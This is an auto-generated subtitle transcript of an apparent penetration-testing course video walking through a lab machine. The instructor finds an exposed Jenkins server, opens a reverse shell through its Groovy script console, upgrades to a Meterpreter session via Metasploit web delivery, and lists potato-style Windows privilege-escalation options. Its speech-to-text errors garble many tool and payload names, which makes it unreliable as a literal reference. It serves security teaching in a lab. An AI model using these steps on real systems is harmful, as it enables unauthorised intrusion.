1
00:00:00,390 --> 00:00:02,580
All right let's take a look at our end MAP results.

2
00:00:02,610 --> 00:00:05,810
So we've got port 80 open for each GDP.

3
00:00:06,300 --> 00:00:11,060
And we've got port fifty thousand open also for HDP.

4
00:00:11,550 --> 00:00:15,000
And then we've got our P.S. and SMB open.

5
00:00:15,180 --> 00:00:19,080
So we have a few different paths we can take and to save time.

6
00:00:19,080 --> 00:00:23,630
I'm going to take us down the correct path but we could look at four forty five.

7
00:00:23,640 --> 00:00:27,360
We could do SMB client see if we can connect anonymously.

8
00:00:27,360 --> 00:00:34,380
We can do more information gathering or more renumeration on for forty five see what services running

9
00:00:34,380 --> 00:00:39,780
or what version of samba is running or SMB is running and see if that has any exploits available for

10
00:00:39,780 --> 00:00:40,530
it.

11
00:00:40,650 --> 00:00:47,190
But here in this case we're just going to run off of port 80 important fifty thousand.

12
00:00:47,190 --> 00:00:48,540
So let's go navigate to those.

13
00:00:48,540 --> 00:00:50,940
I'm going to copy this real quick.

14
00:00:50,940 --> 00:00:55,540
Let's navigate to those and see let's do this.

15
00:01:00,010 --> 00:01:06,520
We'll navigate there and then we'll also do an H TTP and we'll do 50000

16
00:01:10,300 --> 00:01:10,750
OK.

17
00:01:10,850 --> 00:01:12,590
So we've got two things here.

18
00:01:12,650 --> 00:01:14,110
We've got Ask Jeeves.

19
00:01:14,360 --> 00:01:17,840
And when we have a web page like this will probably is going to click around.

20
00:01:17,840 --> 00:01:18,680
See what we've got.

21
00:01:18,750 --> 00:01:21,350
We can see that just giving us a pound sign.

22
00:01:21,470 --> 00:01:28,400
And here we could try to search something and it throws up this error which this would absolutely be

23
00:01:28,460 --> 00:01:32,580
a finding on a pen test.

24
00:01:32,600 --> 00:01:37,100
So we're seeing some sort of sequel air and it's trying to tell us maybe hey there's some sort of sequel

25
00:01:37,100 --> 00:01:43,640
injection here and it's giving us a sequel server and all this other stuff except if we drag this this

26
00:01:43,640 --> 00:01:45,450
is actually just an image.

27
00:01:45,500 --> 00:01:47,360
So it's just a trick page.

28
00:01:47,360 --> 00:01:50,060
There's nothing actually here.

29
00:01:50,150 --> 00:01:54,830
So our options here and if we come to fifty thousand we could see there's a powered by Jedi which takes

30
00:01:54,830 --> 00:01:57,830
us to Jedi and there's nothing there either.

31
00:01:57,830 --> 00:02:05,990
So if we're sure that eighty thousand or if we're sure that port 80 is our path then we need to explore

32
00:02:06,050 --> 00:02:09,100
maybe directory busting here and see where we can get.

33
00:02:09,110 --> 00:02:14,900
So what we're gonna do is we're just going to run door buster against fifty thousand and we would say

34
00:02:14,900 --> 00:02:21,070
door buster and like this or you can run door buster but then you come in here and you would specify.

35
00:02:21,920 --> 00:02:27,980
So we would just say hey I want to run it against this and I'm going to say go faster I'm going to give

36
00:02:27,980 --> 00:02:28,930
it a wordless.

37
00:02:28,940 --> 00:02:39,990
So I like to actually use the built in wordless under user share and then wordless and then there is

38
00:02:39,990 --> 00:02:44,600
door buster in here there's actually a door buster under the user share as well that you can use.

39
00:02:44,940 --> 00:02:48,870
And then the medium lowercase list is what I use.

40
00:02:48,870 --> 00:02:55,670
So I'm just gonna leave it with P HP and we're just gonna let it run for the sake of this walk through

41
00:02:55,670 --> 00:02:58,750
in the sake of this video we're just gonna kind of skip ahead a little bit.

42
00:02:58,760 --> 00:03:00,470
We'll look at the results later on.

43
00:03:00,470 --> 00:03:04,430
But what we're gonna find here is we're going to find and ask Jeeves.

44
00:03:04,430 --> 00:03:07,020
PAGE There's gonna be something like this.

45
00:03:07,040 --> 00:03:14,250
Ask Jeeves and we're going to go ahead and find that directory and this is where realism kind of comes

46
00:03:14,250 --> 00:03:15,030
into play.

47
00:03:15,120 --> 00:03:19,680
I find Jenkins servers all the time and I find Jake and servers.

48
00:03:19,680 --> 00:03:25,140
Now we have a log in so we could go try to log in with a password or credentials by C. Jenkins servers

49
00:03:25,140 --> 00:03:32,220
like this where you have bills out there and you have all sort of information on like leak credentials

50
00:03:32,280 --> 00:03:34,890
all kinds of things user user names.

51
00:03:34,890 --> 00:03:40,510
I see API tokens I see all kinds of stuff hiding and Jake in servers on internal pen test.

52
00:03:40,560 --> 00:03:46,860
So if you're watching this you have ever take a server security Jake and server but ok if we go to manage

53
00:03:46,860 --> 00:03:52,860
JENKINS There's a nice little feature in here and that is the script console.

54
00:03:52,860 --> 00:03:58,530
Now Jenkins is very well known for having a script console and here I'm going to go ahead and say cancel

55
00:03:58,530 --> 00:04:03,790
on this and you can actually see I'm on a pause or stop this.

56
00:04:03,790 --> 00:04:04,360
You can see that.

57
00:04:04,360 --> 00:04:07,030
Ask Jeeves has been found in the directory.

58
00:04:07,030 --> 00:04:08,320
So we have asked Jeeves.

59
00:04:08,320 --> 00:04:11,630
It's already found that I'm going to go ahead to stop this.

60
00:04:11,800 --> 00:04:19,290
So we have this script console in the script console runs groovy.

61
00:04:19,290 --> 00:04:21,110
Now Ruby is a language.

62
00:04:21,590 --> 00:04:31,850
OK so what if we did something like Google and we said groovy reverse shelf pure groovy Java reverse

63
00:04:31,870 --> 00:04:34,230
shall I can't make this up.

64
00:04:34,240 --> 00:04:36,370
It is honestly this easy.

65
00:04:36,520 --> 00:04:43,250
Let's copy this and this will allow us to get a reverse shell with Jenkins.

66
00:04:43,250 --> 00:04:48,580
So please don't have your script console open because this is just nasty.

67
00:04:48,780 --> 00:04:54,330
So tend not 10 to 14 but three is where I'm sitting port 80 forty four is fine by me.

68
00:04:54,530 --> 00:05:03,190
So I'm going to open up a new window and I'm going to say that cat and the LP eighty forty four and

69
00:05:03,360 --> 00:05:07,680
I was going gonna run this and boom.

70
00:05:07,950 --> 00:05:09,030
It's that easy.

71
00:05:09,070 --> 00:05:10,650
It's really that easy.

72
00:05:10,750 --> 00:05:14,470
So watch out for your Jenkins senses again.

73
00:05:14,470 --> 00:05:19,360
And if you're a pen tester look for those because they are a valuable valuable resources.

74
00:05:19,360 --> 00:05:20,070
So here we are.

75
00:05:20,110 --> 00:05:25,870
We are on this machine and I'm going to kind of do a little bit of the numerator now and then we'll

76
00:05:25,870 --> 00:05:29,560
move on in the next video and we'll actually do the escalation.

77
00:05:29,650 --> 00:05:35,690
So if we're all this machine the first thing I want to do is I want to say who am I right.

78
00:05:35,710 --> 00:05:37,870
OK we are.

79
00:05:37,930 --> 00:05:38,800
Who am I.

80
00:05:38,870 --> 00:05:41,740
And we are this Jeeves co Suki.

81
00:05:41,800 --> 00:05:43,420
I don't know how to say it.

82
00:05:43,420 --> 00:05:44,080
We could do the quick.

83
00:05:44,080 --> 00:05:44,620
Who am I.

84
00:05:44,620 --> 00:05:49,750
Slash preferred since we know that's kind of what we're looking at at this point and you kind of already

85
00:05:49,750 --> 00:05:51,850
know because of the section where we're going.

86
00:05:51,880 --> 00:05:56,590
We're gonna go on this path but we could see here that the impersonate privilege is enabled.

87
00:05:56,620 --> 00:06:02,960
So are we all should start spending Hey impersonate privilege maybe I've got something here.

88
00:06:02,970 --> 00:06:09,830
So what we're gonna do is we can also pull down just to show you we could pull down system info and

89
00:06:09,830 --> 00:06:15,570
save this out to a file and run our windows privilege checker right.

90
00:06:15,620 --> 00:06:16,640
So I can come here.

91
00:06:16,640 --> 00:06:17,840
Copy this.

92
00:06:18,140 --> 00:06:22,370
And then let's just go ahead and say oh it's actually here.

93
00:06:22,400 --> 00:06:23,320
Let me do this.

94
00:06:23,360 --> 00:06:30,320
We'll go to a new tab here and I'll just say gee edit this info text even though I've got this in here

95
00:06:30,410 --> 00:06:36,400
paste and say and then I don't ever remember the command because it involves a little bit of stuff.

96
00:06:36,410 --> 00:06:44,240
So I just type in history and then I say grep windows X place to gesture and I just copy one of these

97
00:06:45,700 --> 00:06:50,270
so well to say Windows X place to gesture and then it's got your database that you used last time we

98
00:06:50,270 --> 00:06:57,580
were doing this to the enumeration section a pasted in here and it's gonna run this and we're going

99
00:06:57,580 --> 00:07:03,950
to see what sort of things come up so I'll make this a little bit bigger for here.

100
00:07:04,260 --> 00:07:07,670
And if we scroll through this there's a lot of different things right.

101
00:07:07,760 --> 00:07:14,290
But the hot potato comes up rotten potato comes up tater comes up these are all potato attacks.

102
00:07:14,460 --> 00:07:19,360
So if you're seeing this this is one of the easiest ways to get escalation on a system.

103
00:07:19,440 --> 00:07:25,290
We have things for Internet Explorer but those are really Microsoft Edge those aren't really what we're

104
00:07:25,290 --> 00:07:26,860
after here.

105
00:07:27,600 --> 00:07:30,030
If I see a potato attack I'm going to try that first.

106
00:07:30,360 --> 00:07:33,030
So it's something to be thinking out and thinking for.

107
00:07:33,050 --> 00:07:35,840
But I mean you have all kinds of attacks here.

108
00:07:35,970 --> 00:07:40,440
So this is something that you should run pretty much right away and see what you can get.

109
00:07:40,440 --> 00:07:44,730
You could also drop one piece on this machine and run one piece see what that pulls back it's gonna

110
00:07:44,760 --> 00:07:46,420
pull back a lot of the same.

111
00:07:46,530 --> 00:07:51,350
So don't be afraid to to look through some of these see where you can get escalation.

112
00:07:51,420 --> 00:07:56,680
Now the other thing that we're gonna do because we're doing a potato attack is we're going to run Metis

113
00:07:56,820 --> 00:07:57,490
for this one.

114
00:07:57,510 --> 00:08:00,660
This is the most common and easiest way to do it.

115
00:08:00,870 --> 00:08:03,000
So that's how we're going to perform it.

116
00:08:03,000 --> 00:08:06,680
We're gonna go through and we're going to go ahead and just get a Metis blade shell really quick.

117
00:08:06,690 --> 00:08:17,120
So I'm going to say as MSF console and we're going to do a web delivery so we're gonna go ahead and

118
00:08:17,120 --> 00:08:27,170
just say use mall tie for use exploit multi script web delivery and here's how we're gonna set this

119
00:08:27,170 --> 00:08:27,710
up we're gonna say.

120
00:08:27,710 --> 00:08:31,630
Options and we have targets down here.

121
00:08:31,650 --> 00:08:35,580
We go ahead and show targets we're not going to use Python w Python was on the machine.

122
00:08:35,780 --> 00:08:39,770
We're just go ahead and go for power shell because this is gonna give us a power shall command to run

123
00:08:39,830 --> 00:08:41,250
and it's gonna run it for us.

124
00:08:41,390 --> 00:08:48,440
So we're just gonna go ahead and say set target to and then we're going to have to change the payload

125
00:08:48,440 --> 00:08:51,710
because the payload is also a python.

126
00:08:51,710 --> 00:09:02,160
Now I'm going to set this payload to Windows mature printer reverse TCB and why am I doing that.

127
00:09:02,180 --> 00:09:08,750
I'm doing that because I tried X 64 on this when I went through this the first time and it did not work.

128
00:09:08,990 --> 00:09:10,300
So X 64 does not work.

129
00:09:10,310 --> 00:09:13,790
We're actually going to have to just get a lower level shell and go from there.

130
00:09:14,120 --> 00:09:19,460
So we're going to an X 86 shell and if we need to migrate we will but for now let's just go ahead and

131
00:09:19,520 --> 00:09:21,860
do this and then we're going to set the Al host.

132
00:09:22,280 --> 00:09:31,310
So my L host is 10 dot 10 dot 14 dot three and my server hosts is gonna be 10 dot 10 to 14 dot three

133
00:09:31,310 --> 00:09:31,870
as well.

134
00:09:35,380 --> 00:09:38,950
When we type options one more time we should have all the settings set.

135
00:09:39,140 --> 00:09:47,920
So a server host is set R L host to set our payload is set and our exploit target is set to power show.

136
00:09:47,940 --> 00:09:52,240
And I'm just gonna run this and say hey give us this power shall command to run.

137
00:09:52,430 --> 00:09:57,430
The job is already started in the background so we'll have to worry about anything and then all we gotta

138
00:09:57,440 --> 00:10:03,740
do is come in here and just paste this hit enter and hopefully the magic works over here.

139
00:10:03,740 --> 00:10:04,250
OK.

140
00:10:04,280 --> 00:10:07,160
Starting a fire we should get a shell.

141
00:10:07,160 --> 00:10:07,980
There we go.

142
00:10:09,290 --> 00:10:15,340
So now with this type in sessions one in open up our session and here we can do a quick get your ideas

143
00:10:15,340 --> 00:10:16,980
see where the same user.

144
00:10:16,980 --> 00:10:22,460
We could do the this info and see that we are x eighty six on sixty four architecture so we might need

145
00:10:22,460 --> 00:10:30,230
to migrate and we can also do a get Krebs we could say hey what get probes do we have.

146
00:10:30,230 --> 00:10:34,370
So this is the material way of doing it again we see this in person a privilege.

147
00:10:34,410 --> 00:10:35,790
This is what we're after.

148
00:10:35,880 --> 00:10:47,360
Now we could run the Post that allow us post multi recon and then local exploits the gesture just like

149
00:10:47,360 --> 00:10:47,830
that.

150
00:10:48,320 --> 00:10:53,410
And this is gonna do that same type of checking it's going to see what's available to us.

151
00:10:53,420 --> 00:10:57,470
And you're going to see that there are a couple of built in potato attacks as well.

152
00:10:57,470 --> 00:10:59,680
So let's go ahead and let this run really quick.

153
00:10:59,810 --> 00:11:06,230
Actually what we'll do is let this run we'll stop the video here and we'll go ahead and move on in the

154
00:11:06,230 --> 00:11:09,590
next video and we'll actually start the escalation process.

155
00:11:09,590 --> 00:11:11,220
So take a look at what's here.

156
00:11:11,360 --> 00:11:12,610
You can see juicy.

157
00:11:12,620 --> 00:11:16,040
This is a potato attack reflection also potato attack.

158
00:11:16,040 --> 00:11:19,520
So two potato attacks right here.

159
00:11:19,520 --> 00:11:20,870
Go ahead pause now.

160
00:11:20,930 --> 00:11:23,700
Meaning the next video and we actually start working on the escalation.

161
00:11:23,720 --> 00:11:25,150
So I'll catch you over in the next video.